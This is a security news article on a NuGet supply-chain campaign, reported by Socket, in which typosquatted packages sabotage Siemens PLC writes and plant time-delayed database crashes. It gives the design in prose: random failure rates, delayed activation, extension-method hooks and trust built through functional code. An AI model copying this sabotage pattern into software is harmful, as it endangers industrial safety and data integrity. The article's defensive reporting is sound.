Table of Contents
A elegant campaign has injected malicious code into nine packages on the NuGet repository, with some designed to remain dormant until 2027 and 2028, posing a critical threat to both database systems and, alarmingly, industrial control systems (ICS). The attack, discovered by Socket, highlights a growing trend of supply chain attacks targeting operational technology (OT).
The malicious packages, which have amassed nearly 9,500 downloads, employ a variety of techniques to evade detection and build trust with developers.According to researchers,the threat actor,identified as ‘shanhai666,’ has demonstrated a high level of sophistication in crafting these attacks.
ICS Targeted by Sharp7Extend Typosquat
The most concerning package identified is Sharp7Extend, a “typosquat” designed to mimic the legitimate Sharp7 library.Sharp7 is a widely used tool for communicating with Siemens S7 Programmable Logic controllers (PLCs) – essential components in manufacturing, energy, and logistics responsible for managing physical processes.
Sharp7Extend initially appears harmless, bundling the unmodified, functional Sharp7 library to ensure adoption during testing.Though, it contains two distinct sabotage mechanisms. The first causes random crashes in request dialog with PLCs,occurring 20 percent of the time. More insidiously, after a 30 to 90-minute “grace period,” the package silently causes 80 percent of PLC write operations to fail.
“This means an application believes it has successfully sent a command – like ‘engage safety system’ or ‘update setpoint’ – but the command is never executed,” researchers explained.This can lead to data corruption and, critically, potential physical safety risks.
Database Packages with delayed Activation
While Sharp7Extend poses an immediate threat to industrial operations, several othre malicious packages target databases.These packages contain dormant code set to activate in 2027 and 2028,at which point they have a 20 percent chance of terminating the entire application on each database query.
The malware leverages C# extension methods, allowing the malicious code to run transparently with every database query or PLC operation. This stealthy approach makes detection considerably more challenging.
A Trojan Horse Approach to Building Trust
The threat actor has employed a clever strategy to increase the likelihood of successful deployment. The packages are reported to be 99 percent functional,offering working implementations of advertised features like database repository patterns and transaction management. To further establish credibility, ‘shanhai666’ even published three wholly legitimate packages.
This tactic transforms the malicious code into a “Trojan horse,” concealing the harmful payload within thousands of lines of legitimate implementation.
Attribution Challenges and the Need for Proactive Security
Due to the probabilistic and time-delayed nature of these attacks, attribution is proving exceptionally difficult. A senior official stated that an application crashing in 2027 is unlikely to be directly linked to a dependency installed years earlier by a developer who may no longer be with the organization. The random crashes effectively mimic intermittent bugs, hindering forensic investigations.
Traditional security vetting processes are no longer sufficient to detect these sophisticated threats. The immediate priority is a comprehensive audit of all .NET applications to identify and remove the nine malicious NuGet packages. any system running Sharp7Extend should be considered compromised and thoroughly investigated for data integrity issues.
This latest campaign underscores the increasing targeting of operational technology via IT supply chains. new security controls, such as write verification for PLC communications and baseline monitoring to detect anomalous failure rates, are essential. Security teams must evolve beyond simply checking for known vulnerabilities and actively hunt for malicious intent through behavioral analysis of all third-party code.
